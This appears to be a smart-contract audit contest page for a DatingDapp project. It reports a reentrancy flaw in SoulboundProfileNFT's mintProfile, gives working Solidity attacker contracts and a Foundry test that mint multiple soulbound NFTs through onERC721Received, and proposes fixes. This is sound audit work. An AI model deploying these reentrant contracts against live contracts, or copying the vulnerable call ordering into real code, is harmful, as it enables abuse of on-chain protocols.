DatingDapp
AI First Flight #6
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Previous Next
Submission Details
Severity: medium
Valid

mintProfile CEI violation enables reentrant multi-minting via onERC721Received

r0p

Title: mintProfile CEI violation enables reentrant multi-minting via onERC721Received
Severity: Medium
Impact: Attacker mints multiple profile NFTs bypassing the one-profile-per-address rule.
Likelihood: Medium — requires deploying a malicious contract with ERC721 callback.
Reference Files: src/SoulboundProfileNFT.sol:30-41

Description

mintProfile calls _safeMint (triggers onERC721Received) BEFORE setting profileToToken. A reentrant call sees profileToToken[msg.sender] == 0 and mints another NFT. The vulnerable code:

function mintProfile(string memory name, uint8 age, string memory profileImage) external {
require(profileToToken[msg.sender] == 0, "Profile already exists");
uint256 tokenId = ++_nextTokenId;
_safeMint(msg.sender, tokenId); // ← external callback first
_profiles[tokenId] = Profile(name, age, profileImage);
profileToToken[msg.sender] = tokenId; // ← set after callback
}

During onERC721Received, the reentrant call passes the profileToToken == 0 check and mints a second NFT.

Risk

Impact: Medium. Attacker mints multiple soulbound NFTs consuming token IDs and bloating state. Only the last-minted profile is usable but extras are permanently owned.
Likelihood: Medium. Deploy contract that reenters mintProfile from onERC721Received. Single transaction.
An attacker mints 10 profile NFTs wasting token IDs and on-chain storage.

Proof of Concept

contract ReentrantMinter {
SoulboundProfileNFT nft; uint256 count;
constructor(SoulboundProfileNFT _n) { nft = _n; }
function attack() external { nft.mintProfile("A", 25, "ipfs://a"); }
function onERC721Received(address, address, uint256, bytes calldata)
external returns (bytes4) {
if (count < 3) { count++; nft.mintProfile("A2", 25, "ipfs://a2"); }
return this.onERC721Received.selector;
}
}

Deploy and call attack() — mints 4 NFTs in one transaction.

Recommended Mitigation

function mintProfile(string memory name, uint8 age, string memory profileImage) external {
require(profileToToken[msg.sender] == 0, "Profile already exists");
uint256 tokenId = ++_nextTokenId;
profileToToken[msg.sender] = tokenId; // set FIRST
_profiles[tokenId] = Profile(name, age, profileImage);
_safeMint(msg.sender, tokenId); // callback LAST
emit ProfileMinted(msg.sender, tokenId, name, age, profileImage);
}

Setting profileToToken before _safeMint follows CEI — reentrant call fails the require(profileToToken == 0) check.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge 1 day ago
Submission Judgement Published
Validated
Assigned finding tags:

[M-04] Reentrancy in `SoulboundProfileNft::mintProfile` allows minting multiple NFTs per address, which disrupts protocol expectations

## Description In `mintProfile`, the internal `_safeMint` function is called before updating the contract state (`_profiles[tokenId]` and `profileToToken[msg.sender]`). This violates CEI, as `_safeMint` calls an internal function that could invoke an external contract if `msg.sender` is a contract with a malicious `onERC721Received` implementation. Source Code: ```solidity function mintProfile(string memory name, uint8 age, string memory profileImage) external { require(profileToToken[msg.sender] == 0, "Profile already exists"); uint256 tokenId = ++_nextTokenId; _safeMint(msg.sender, tokenId); // Store metadata on-chain _profiles[tokenId] = Profile(name, age, profileImage); profileToToken[msg.sender] = tokenId; emit ProfileMinted(msg.sender, tokenId, name, age, profileImage); } ``` ## Vulnerability Details Copy this test and auxiliary contract in the unit test suite to prove that an attacker can mint multiple NFTs: ```solidity function testReentrancyMultipleNft() public { MaliciousContract maliciousContract = new MaliciousContract( address(soulboundNFT) ); vm.prank(address(maliciousContract)); MaliciousContract(maliciousContract).attack(); assertEq(soulboundNFT.balanceOf(address(maliciousContract)), 2); assertEq(soulboundNFT.profileToToken(address(maliciousContract)), 1); } ``` ```Solidity contract MaliciousContract { SoulboundProfileNFT soulboundNFT; uint256 counter; constructor(address _soulboundNFT) { soulboundNFT = SoulboundProfileNFT(_soulboundNFT); } // Malicious reentrancy attack function attack() external { soulboundNFT.mintProfile("Evil", 99, "malicious.png"); } // Malicious onERC721Received function function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) external returns (bytes4) { // Reenter the mintProfile function if (counter == 0) { counter++; soulboundNFT.mintProfile("EvilAgain", 100, "malicious2.png"); } return 0x150b7a02; } } ``` ## Impact The attacker could end up having multiple NTFs, but only one profile. This is because the `mintProfile`function resets the `profileToToken`mapping each time. At the end, the attacker will have only one profile connecting with one token ID with the information of the first mint. I consider that the severity is Low because the `LikeRegistry`contract works with the token IDs, not the NFTs. So, the impact will be a disruption in the relation of the amount of NTFs and the amount of profiles. ## Recommendations To follow CEI properly, move `_safeMint` to the end: ```diff function mintProfile(string memory name, uint8 age, string memory profileImage) external { require(profileToToken[msg.sender] == 0, "Profile already exists"); uint256 tokenId = ++_nextTokenId; - _safeMint(msg.sender, tokenId); // Store metadata on-chain _profiles[tokenId] = Profile(name, age, profileImage); profileToToken[msg.sender] = tokenId; + _safeMint(msg.sender, tokenId); emit ProfileMinted(msg.sender, tokenId, name, age, profileImage); } ```

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!